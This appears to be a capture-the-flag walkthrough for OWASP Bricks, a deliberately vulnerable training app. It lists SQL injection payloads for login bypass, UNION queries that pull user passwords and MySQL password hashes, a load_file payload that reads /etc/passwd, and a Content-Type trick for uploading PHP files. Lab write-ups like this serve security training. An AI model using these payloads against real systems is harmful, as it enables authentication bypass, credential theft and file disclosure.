Cover Image

OWASP Bricks
 May 22, 2021    CTF

Bricks - Login 1

  • Username: any
  • Password: ' OR '1'='1
  • Resulting Query: SELECT * FROM users WHERE name='aaaaa' and password='' OR '1'='1'


Bricks - Login 2

  • Open the web browser DevTools and remove the onsubmit property of the <form ...> element
  • This disables the special character checker
  • Username: any
  • Password: ' OR '1'='1
  • Resulting Query: SELECT * FROM users WHERE name='aaaaa' and password='' OR '1'='1'


Bricks - Login 3

  • Username: any
  • Password: ') OR '1'=('1
  • Resulting Query: SELECT * FROM users WHERE name=('aaaa') and password=('') OR '1'=('1') LIMIT 0,1


Bricks - Login 4

  • Username: any
  • Password: 1") or 1=1-- -
  • Resulting Query: SQL Query: SELECT * FROM users WHERE name=("1") or 1=1-- -") and password=("1") or 1=1-- -")


Bricks - Login 5

  • Username: any
  • Password: 1' or 1=1 #
  • Resulting Query: SQL Query: SELECT * FROM users WHERE name='1' or 1=1 #' and password = 'ed4fd85ad3da26c458d9263aebd62065'


Bricks - Login 6

  • Username: any
  • Password: any


Bricks - File Upload pages 1

  • Make a PHP file containing the code snippet<?php echo phpversion() ?> and upload it
  • Access the uploaded file/owaspbricks/upload-1/uploads/<filename>.php over the browser, it will display the PHP version


Bricks - File Upload pages 2

  • Upload the PHP file from the first challenge, the website will display the error "Upload failed"
  • Open the Network tab in your Browser and select the latest index.php request
  • With the "Edit and Resend" option, the Content-Type: application/x-php in the Request Body can be changed to Content-Type: image/png and resend
  • This will display the file upload path in the Response tab


Bricks - File Upload pages 3

  • Equivalent to File Upload pages 2


Bricks - Content pages 1

  • On Content pages 1 you can iterate through all users by incrementing the ID in the URL parameter
  • The Website allows you to iterate through all users by incrementing the ID in the URL parameter

  • You can read any database content using UNION:

    - read user passwords
id=1 and 1=2 union select name,password,idusers,4,5,6,7,8 from users where idusers=0 --

- read mysql username and password hash
id=1 and 1=2 union select User(),password,3,4,5,6,7,8 from mysql.user--

- read /etc/passwd
id=1 and 1=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8 from mysql.user--


Bricks - Content pages 2

  • Content pages 2 is very similar, swap id=1 with user=tom and append -- - at the end


Bricks - Content pages 3

  • Content pages 3 only differs by transmitting the injection string with POST


Bricks - Content pages 4

  • Content pages 4 transmits the injection string with your user agent


Bricks - Content pages 5

  • Content pages 5 transmits the injection string with the USER cookie


Bricks - Content pages 6

  • Content pages 6 is identical to 1 except the id parameter is base64 encoded